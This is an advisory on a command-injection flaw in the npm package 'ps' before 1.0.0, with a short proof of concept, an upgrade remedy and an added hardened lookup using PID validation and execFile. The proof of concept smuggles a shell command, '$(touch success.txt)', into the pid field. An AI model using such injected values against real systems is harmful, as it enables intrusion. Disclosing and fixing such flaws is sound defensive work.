Severity: moderate

Command Injection

ps

Overview

Versions of ps before 1.0.0 are vulnerable to command injection.

Proof of concept:

var ps = require('ps');

ps.lookup({ pid: "$(touch success.txt)" }, function(err, proc) { // this method is vulnerable to command injection
    if (err) {throw err;}
    if (proc) {
        console.log(proc);  // Process name, something like "node" or "bash"
    } else {
        console.log('No such process');
    }
});

// Result: The file success.txt will exist on the filesystem if the touch command was executed

Remediation

Update to version 1.0.0 or later.
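
The defensive pattern for this class of bug, as an added example that is not code from the ps package or from this advisory: validate the PID as a decimal integer, then run the system ps binary through execFile with an argument array so that no shell parses the input. The function names are hypothetical, and the lookup assumes a POSIX ps on PATH.

```javascript
// Added example: not code from the ps package. Function names are hypothetical.
const { execFile } = require('child_process');

// The risky pattern: caller input concatenated into a string that a shell
// will parse. Shell syntax such as $(...) inside `pid` survives intact.
function shellCommandLine(pid) {
  return 'ps -o pid= -o comm= -p ' + pid;
}

// Accept only a canonical positive decimal integer (string or number) of at
// most 10 digits; throw TypeError on anything else.
function parsePid(value) {
  if (typeof value !== 'string' && typeof value !== 'number') {
    throw new TypeError('pid must be a string or number');
  }
  if (!/^[1-9][0-9]{0,9}$/.test(String(value))) {
    throw new TypeError('pid must be a positive decimal integer');
  }
  return Number(value);
}

// Hardened lookup: validate first, then call ps via execFile, which hands the
// argument array to the program directly and never invokes a shell.
function safeLookup(pid, callback) {
  let checked;
  try {
    checked = parsePid(pid);
  } catch (err) {
    return process.nextTick(callback, err);
  }
  const args = ['-o', 'pid=', '-o', 'comm=', '-p', String(checked)];
  execFile('ps', args, (err, stdout) => {
    // ps exits with status 1 when no process matches the pid.
    if (err && err.code === 1) return callback(null, null);
    if (err) return callback(err);
    const m = /^\s*(\d+)\s+(.*)$/.exec(stdout.trim());
    callback(null, m ? { pid: Number(m[1]), command: m[2] } : null);
  });
}

// The advisory's payload is rejected before any process is spawned.
safeLookup('$(touch success.txt)', (err) => console.log('rejected:', err.message));
// A real PID (this Node process) is looked up without a shell.
safeLookup(process.pid, (err, proc) => console.log(err || proc));
```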

Advisory timeline

  1. Created: 2018-11-07T21:09:43.189Z
  2. Updated: 2018-11-07T21:09:48.095Z